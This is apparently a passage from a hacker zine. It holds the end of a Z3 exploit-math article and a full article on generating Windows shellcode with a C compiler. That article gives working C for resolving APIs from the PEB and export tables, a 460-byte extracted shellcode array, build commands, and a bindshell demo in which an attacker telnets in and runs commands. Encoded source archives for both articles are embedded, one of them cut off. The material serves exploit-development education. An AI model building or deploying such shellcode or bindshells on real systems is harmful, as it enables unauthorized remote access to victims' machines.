designed for solving a single one. However, we can easily cheat by adding
additional constraints to the program. A simple example of this, since we
know that a buffer size of 112 is possible, we simply add a constraint
making sure that allocsize is less than that. 

     s.add(ULT(allocsize & 0xffffffff,112))

Solving again, we can see that an allocsize of 98 is possible. Since this
is code we can easily wrap this in a loop to enumerate all possibilities.

    [+] Solving...
    [MODEL---------------------------------------]
    [allocsize = 98,
     height = 732446463,
     width = 4167741711,
     headersize = 113]
    [--------------------------------------------]

--[ Conclusion

Hopefully this small guide is useful to you. I find myself using these
small solvers constantly during exploit dev. Some other areas that these
help with are, during auditing - to confirm findings, during exploitation -
to calculate values on the fly. I'm sure once you start playing with this
library you will do the same. 

--[ References

1. https://z3.codeplex.com/ - Z3 Home Page
2. https://github.com/Z3Prover/z3 - Z3 github page

--[ Appendix: Source code

begin 644 z3_math_src.tgz
M'XL(`&"K858``^U7^T_;2!#FUUC*_S"`>K&)$_R(@T0(4DBX'A*T$H7K232J
M''N=6/@1V1M*./5_O]E=.W$H%)#22*?Z$\2>\;?SV-?L/IA?0YM.OJ:)L[_U
MBZ!IVH%E`7^VQ5,S6N*9`72C;6JF85G&`6BZV=*T+;!^54!%S%)J)QA*1,+X
M9SRD>=Y/OF=Y+)[_$SP4QM].'=\?)[[;=-;J`_NCW6H]._Y&VS`+X]_"\;<L
MS=@";:U1/(/??/QW_<@)9BZ!HY2Z?MR<'$LKJL`?/=8E?C1F.FG7)9X?$?CK
MM#<XO82=QNMQ`[U/_;,S&)SUWE_V+F#XAK8+?(EVEC$,+L]//P!&%Y!(%A$I
MDN1,[`3VG'@ZMR-W-G5M2F2A<U.JBC><^BK,HM0?1\0%/Z*0^@]$D?Z5*B$)
MG>E<9ES&XOJ.5$$9ZEU.0RDA=)9$@,J.]%V2F('0]B.9O=C)&(T+/_A^=S/D
M=E>\??-=.E$GQ!]/J.JCP2PLS$7=\_"W(TD5WY.9+=CN@JD`FJA,<1RH)^_,
M4GM,#N%="D?<TC$<"5O'V#\J=ZH-6=05<N]3N:&S=XRSPMD`7=9I-)X%,N?J
M0_7#]?FYJC&:,/288A0H:"</Y*8^A.L4)X?("$.:L0BXP(S]R!/F<Z*0E"Q;
M$=T16*O9DB2)DT/XS+_2.(8TM(,`FR\S7"2(5C(S>YDKJ&<318%CT.Y-3^!)
M%U?V*"#<18!9$Y#?S118)+0P^83?8J*]((@=F[)L1S//(PF?-6Z>,SP7'YIB
M$P"[WA,/EF;L/)M/AZ>[S<A/9O-Q1B'VX`)WN62^_71_%>/^G/A4#)'M8M`T
MSL/';H#1G))48?$OO6=AKBXUIE3%8BQ2XT3VD:M!!WP<XBP7%.IU4*0*"U^L
M@?!1XCQHEF<HDGQ=EI510NQ;]O8=_W%-IX3*H5K[I[:<G)7PAK\WS"'ZK'U)
M:D6E(931BE(7RGM-X^KG.R!4LP;<D9<0(H>/^IR-M=*I2&P#V>C^7ZS_GNV0
M41S?-J?SM?IXH?YK[0-#U'^M9;0/+%[_3:VL_YO`[O;^+$WV1WZT3Z([F,[I
M)(ZJ4E7RDCB$!Q/\<!HG%/:8KBKU<(:?152N]6I*53K)I1,F]7.ISZ1!+@V8
M5)52E#_%P1U)9"$W;=>5>[B#H94N&"U-`=B%7OT$6$U".>?TD3-@'$L3G'Y]
MP#DHYYQ!XZ3>9YR697%.IF#RPI=@&#IC"%]]X4NW6$1\*0+?_5B@[)33;.ZP
MULZ$.+<L;$IY,6R&L4L"ILC;7'P<G)Z_\M@RW,G;H;FEB;><?)B)]8Q_<?U?
MV+=XF`K(>BPO\=+ZUZSL_J?C!J"9;/WC7[G^-P$LKH=29>PXT`A-`PI70&C$
M2W&S1:G$QE!<_RG?GM==_5]<_[JNMQ?KWS1X_3>L\OZ_$;RI_HO+1Q=.?/HW
M<>0:EVLJF`:6PL5=,?\J%,O/["+!+C\KE%Q94SFK*O'3_B/:0K=@/7V:*/KH
M@JZ;2O[E^OV5N$&HVKV7S3M%P3/`GW&2W3#`L_T@YQ>BZ/YX1UOZ63HXORHT
M^@,OE]G=TE,+;![K+KS81-<-P?TMSR0E2I0H4:)$B1(E2I0H4:)$B1(EUH?_
)`+AIM`(`*```
`
end


|=[ 0x06 ]=---=[ Shellcode the better way, or
                 how to just use your compiler - fishstiqz ]=------------=|


|=-----------------------------------------------------------------------=|
|=----=[ Shellcode the better way, or how to just use your compiler ]----=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ by fishstiqz ]=--------------------------=|
|=-----------------------------------------------------------------------=|


--[ Introduction

Back in the prehistoric days of memory corruption bugs and exploitation,   
exploit developers used our primitive tools to construct rudimentary
payloads in assembly language. Those days are long past. In this small
paper I will investigate some methods for anyone still stuck in the good
ol' days of yore using their assembler.

--[ Prerequisites

This writeup uses the MinGW compiler to demonstrate generating shellcode
from C for running on Windows systems. The same concepts should apply to
other compilers (such as MSVC) with some tweaking. The python scripts also
use the 'pefile' library from erocarrera in order to extract the compiled
code.

To quickly get started compiling on a linux system, do something like:

    $ sudo apt-get install gcc-mingw-w64
    $ pip install pefile

--[ Concepts

There is nothing special about shellcode as opposed to any other compiled
code. A shellcode is simply some piece of machine code that typically
exhibits the following properties:

* Position-independence
* Entry point at first byte
* Bootstrap for subsequent execution / further access

Position-independence is basically the only real hurdle faced when
building shellcode with a C compiler. Strings and imported functions will
need to be handled inline. All code will need to placed in one section
and will need to be ordered appropriately in order to ensure everything is
appropriately extracted and relative jumps are correct.

This paper will not deal with creating shellcodes that are intended to
bypass filters. In the extremely rare event that a filter is necessary
(when is the last time you actually needed one in your browser exploit?)
it is best to write an encoder and decoder.

--[ Inlining strings

Inlining strings is quite easily accomplished with inline assembly as in
the following macro:

    #define INLINE_STR(name, str) \
        const char * name;          \
        asm(                        \
            "call 1f\n"             \
            ".asciz \"" str "\"\n"  \
            "1:\n"                  \
            "pop %0\n"              \
            : "=r" (name)           \
        );

This is how it would be used:

    INLINE_STR(kernel32, "kernel32");
    PVOID pKernel32 = scGetModuleBase(kernel32);

Unfortunately MinGW doesn't have a way to inline a unicode string nor does
MSVC have inline assembly for x64 so a different method must be employed
when these are being used.

One potential way to handle unicode strings would be to generate an inline
sequence of .db bytes as a pre-compile step. For MSVC, writing strings one
character at a time to a stack buffer also works but is quite ugly.

--[ Ordering functions

The Makefile included with the source code makes use of the
-fno-toplevel-reorder switch which causes code to be generated in the same
order they appear in the source files. The Makefile also uses
-falign-functions=1 to reduce padding between functions and generate
smaller code.

Each function is also marked with an attribute forcing them to be
placed into a custom section.

    #define SCFUNC __attribute__((section("sccode")))

This custom section makes extraction of the final code very simple
as all shellcode functions will be placed into the "sccode" section
and ordered appropriately.

In MSVC an order file can be specified with /ORDER to achieve the
same effect.

--[ Example shellcode

The following is a quick GetProcAddress implementation in C which
will be used for the examples here.

    SCFUNC PVOID scGetModuleBase(const char *moduleName)
    {
        PPEB pPeb;
        PLIST_ENTRY head, entry;
        PLDR_DATA_TABLE_ENTRY module;

    #if defined(_M_IX86)
        pPeb = (PPEB) __readfsdword(0x30);
    #elif defined(_M_X64)
        pPeb = (PPEB) __readgsqword(0x60);
    #endif

        head = &pPeb->Ldr->InLoadOrderModuleList;
        entry = head->Flink;

        while (entry != head)
        {
            module = CONTAINING_RECORD(entry, LDR_DATA_TABLE_ENTRY,
            InLoadOrderModuleList);
            if (scW2Anicmp(module->BaseDllName.Buffer, moduleName, scStrlen
            (moduleName)) == 0)
                return module->DllBase;
            entry = entry->Flink;
        }

        return NULL;
    }

    SCFUNC PVOID scGetProcAddr(PVOID modBase, const char *exportName)
    {
        LPVOID pFunc = NULL;
        PBYTE pMod = (PBYTE)modBase;
        PIMAGE_NT_HEADERS pNt = GET_NT_HEADERS(pMod);
        PIMAGE_DATA_DIRECTORY pDir = &GET_DIRECTORY(pNt,
        IMAGE_DIRECTORY_ENTRY_EXPORT);
        PIMAGE_EXPORT_DIRECTORY pExportDir;
        WORD *pOrdinal;
        DWORD *pName;
        DWORD *pFuncs;
        DWORD i;

        // get the export directory
        pExportDir = (PIMAGE_EXPORT_DIRECTORY)(pMod + pDir->
        VirtualAddress);

        // sanity check the export directory
        if (pDir->Size == 0 || pExportDir->NumberOfFunctions == 0 ||
        pExportDir->NumberOfNames == 0)
            return NULL;

        // iterate the exported names
        pName = (DWORD *) (pMod + pExportDir->AddressOfNames);
        pOrdinal = (WORD *) (pMod + pExportDir->AddressOfNameOrdinals);

        // hi EMET!
        pFuncs = (DWORD *) (pMod + pExportDir->AddressOfFunctions);

        for (i = 0; i < pExportDir->NumberOfNames; i++, pName++,
        pOrdinal++)
        {
            if (scStrcmp(exportName, (const char *)(pMod + *pName)) == 0)
            {
                // found the name, get the function
                pFunc =  pMod + pFuncs[*pOrdinal];
                break;
            }
        }

        return pFunc;
    }

Here you can see a quick calc-pop demonstration using the above code:

    #include <stdio.h>
    #include <windows.h>

    #include "common.h"
    #include "pe.h"

    typedef UINT (WINAPI * WinExec_t)(LPCSTR lpCmdLine, UINT uCmdShow);

    SCFUNC void scMain(void)
    {
        INLINE_STR(kernel32, "kernel32");
        INLINE_STR(winexec, "WinExec");
        INLINE_STR(calc, "calc");

        PVOID pKernel32 = scGetModuleBase(kernel32);
        WinExec_t pWinExec = (WinExec_t) scGetProcAddr(pKernel32, winexec);
        if (pWinExec != NULL)
            pWinExec(calc, 0);
    }


    int main(int argc, char* argv[])
    {
        scMain();
        return 0;
    }

Thats all there is to the code. Notice that all shellcode functions
are marked with the SCFUNC attribute and all strings are inlined.

Now to compile and extract the shellcode into a nice header:

    $ i686-w64-mingw32-gcc -fno-toplevel-reorder -falign-functions=1 \
             -Os -o runcalc.exe runcalc.c common.c pe.c
    $ python extract.py runcalc.exe
    // 460 bytes
    unsigned char shellcode[460] = {
    0x55,0x89,0xE5,0x56,0x53,0x83,0xEC,0x10,0xE8,0x09,0x00,0x00,
    0x00,0x6B,0x65,0x72,0x6E,0x65,0x6C,0x33,0x32,0x00,0x58,0x89,
    0x04,0x24,0xE8,0xD1,0x00,0x00,0x00,0xE8,0x08,0x00,0x00,0x00,
    0x57,0x69,0x6E,0x45,0x78,0x65,0x63,0x00,0x5E,0x89,0x74,0x24,
    0x04,0xE8,0x05,0x00,0x00,0x00,0x63,0x61,0x6C,0x63,0x00,0x5B,
    0x89,0x04,0x24,0xE8,0xFD,0x00,0x00,0x00,0x85,0xC0,0x74,0x0F,
    0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x1C,0x24,0xFF,
    0xD0,0x50,0x50,0x8D,0x65,0xF8,0x5B,0x5E,0x5D,0xC3,0x90,0x90,
    0x55,0x31,0xC0,0x89,0xE5,0x57,0x56,0x53,0x51,0x83,0x7D,0x10,
    0x00,0x74,0x44,0x31,0xD2,0x8B,0x45,0x08,0x66,0x8B,0x0C,0x50,
    0x8B,0x45,0x0C,0x8D,0x79,0xBF,0x0F,0xBE,0x1C,0x10,0x0F,0xB7,
    0xC1,0x66,0x83,0xFF,0x19,0x8D,0x70,0x20,0x0F,0x46,0xC6,0x89,
    0x45,0xF0,0x8D,0x73,0xBF,0x89,0xF0,0x3C,0x19,0x8B,0x45,0xF0,
    0x8D,0x7B,0x20,0x0F,0x46,0xDF,0x29,0xD8,0x75,0x0D,0x66,0x85,
    0xC9,0x74,0x08,0x42,0x39,0x55,0x10,0x75,0xC0,0x31,0xC0,0x5A,
    0x5B,0x5E,0x5F,0x5D,0xC3,0x55,0x31,0xD2,0x89,0xE5,0x53,0x8B,
    0x45,0x08,0x8B,0x5D,0x0C,0x8A,0x0C,0x10,0x0F,0xBE,0x1C,0x13,
    0x42,0x0F,0xBE,0xC1,0x29,0xD8,0x75,0x04,0x84,0xC9,0x75,0xE7,
    0x5B,0x5D,0xC3,0x55,0x89,0xE5,0x8B,0x55,0x08,0x89,0xD0,0x80,
    0x38,0x00,0x74,0x03,0x40,0xEB,0xF8,0x29,0xD0,0x5D,0xC3,0x90,
    0x55,0x89,0xE5,0x57,0x56,0x53,0x83,0xEC,0x1C,0x8B,0x75,0x08,
    0x64,0xA1,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x58,0x0C,
    0x8D,0x78,0x0C,0x39,0xFB,0x74,0x28,0x89,0x34,0x24,0xE8,0xC4,
    0xFF,0xFF,0xFF,0x8B,0x53,0x30,0x89,0x74,0x24,0x04,0x89,0x14,
    0x24,0x89,0x44,0x24,0x08,0xE8,0x36,0xFF,0xFF,0xFF,0x85,0xC0,
    0x75,0x05,0x8B,0x43,0x18,0xEB,0x06,0x8B,0x1B,0xEB,0xD4,0x31,
    0xC0,0x83,0xC4,0x1C,0x5B,0x5E,0x5F,0x5D,0xC3,0x55,0x89,0xE5,
    0x57,0x56,0x53,0x83,0xEC,0x2C,0x8B,0x5D,0x08,0x8B,0x43,0x3C,
    0x01,0xD8,0x8B,0x70,0x78,0x01,0xDE,0x83,0x78,0x7C,0x00,0x75,
    0x04,0x31,0xC0,0xEB,0x63,0x83,0x7E,0x14,0x00,0x74,0xF6,0x83,
    0x7E,0x18,0x00,0x74,0xF0,0x8B,0x46,0x20,0x31,0xD2,0x8B,0x4E,
    0x1C,0x01,0xD8,0x89,0x45,0xE4,0x8B,0x46,0x24,0x01,0xD8,0x89,
    0x45,0xE0,0x8D,0x3C,0x12,0x03,0x7D,0xE0,0x3B,0x56,0x18,0x73,
    0xD0,0x89,0x4D,0xD8,0x8B,0x4D,0xE4,0x89,0x55,0xDC,0x8B,0x04,
    0x91,0x01,0xD8,0x89,0x44,0x24,0x04,0x8B,0x45,0x0C,0x89,0x04,
    0x24,0xE8,0x0F,0xFF,0xFF,0xFF,0x8B,0x55,0xDC,0x8B,0x4D,0xD8,
    0x85,0xC0,0x75,0x0D,0x0F,0xB7,0x07,0x8D,0x04,0x83,0x03,0x1C,
    0x08,0x89,0xD8,0xEB,0x03,0x42,0xEB,0xBE,0x83,0xC4,0x2C,0x5B,
    0x5E,0x5F,0x5D,0xC3
    };

And now to demonstrate running the test harness:

    $ python extract.py --testharness runcalc.exe > runcalc_testharness.c
    $ i686-w64-mingw32-gcc -fno-toplevel-reorder -falign-functions=1 \
          -Os -o runcalc_testharness.exe runcalc_testharness.c

On the windows machine:

    C:\phrack\src>runcalc_testharness.exe
    jumping to shellcode @ 00020000
    done
    C:\phrack\src>tasklist | findstr calc
    calc.exe                      5720 Console                    1     
    14,244 K

--[ Bindshell example

The following is a demonstration of a quick windows bindshell. Consult the
source code for the implementation.

On the linux compiler:

    $ i686-w64-mingw32-gcc -fno-toplevel-reorder -falign-functions=1 \
             -Os -o bindshell.exe bindshell.c common.c pe.c
    $ python extract.py --testharness bindshell.exe > \
             bindshell_testharness.c
    $ i686-w64-mingw32-gcc -fno-toplevel-reorder -falign-functions=1 \
             -Os -o bindshell_testharness.exe bindshell_testharness.c

On the windows machine:

    C:\phrack\src>bindshell_testharness.exe
    jumping to shellcode @ 00020000

Attacker:

    $ telnet 192.168.204.144 3333
    Trying 192.168.204.144...
    Connected to 192.168.204.144.
    Escape character is '^]'.
    Microsoft Windows [Version 10.0.10240]
    (c) 2015 Microsoft Corporation. All rights reserved.

    C:\phrack\src>ver
    ver

    Microsoft Windows [Version 10.0.10240]

    C:\phrack\src>whoami
    whoami
    win10-vm\user

    C:\phrack\src>exit
    exit
    Connection closed by foreign host.


--[ Conclusion

Hopefully this humble paper showed that its super easy to generate
shellcode with a C compiler and that you don't have to use an assembler.
Obviously assembly language development and understanding are still
essential skills for a modern exploit developer. However, using the
techniques presented in this paper should limit the times when
hand-written assembly code is required to a few specific cases.

--[ References

1. http://www.mingw.org/
2. https://github.com/erocarrera/pefile
3. https://gcc.gnu.org/onlinedocs/gcc/Optimize-Options.html
4. https://msdn.microsoft.com/en-us/library/00kh39zz.aspx

--[ Appendix: Source code

begin 644 src.tar.gz
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
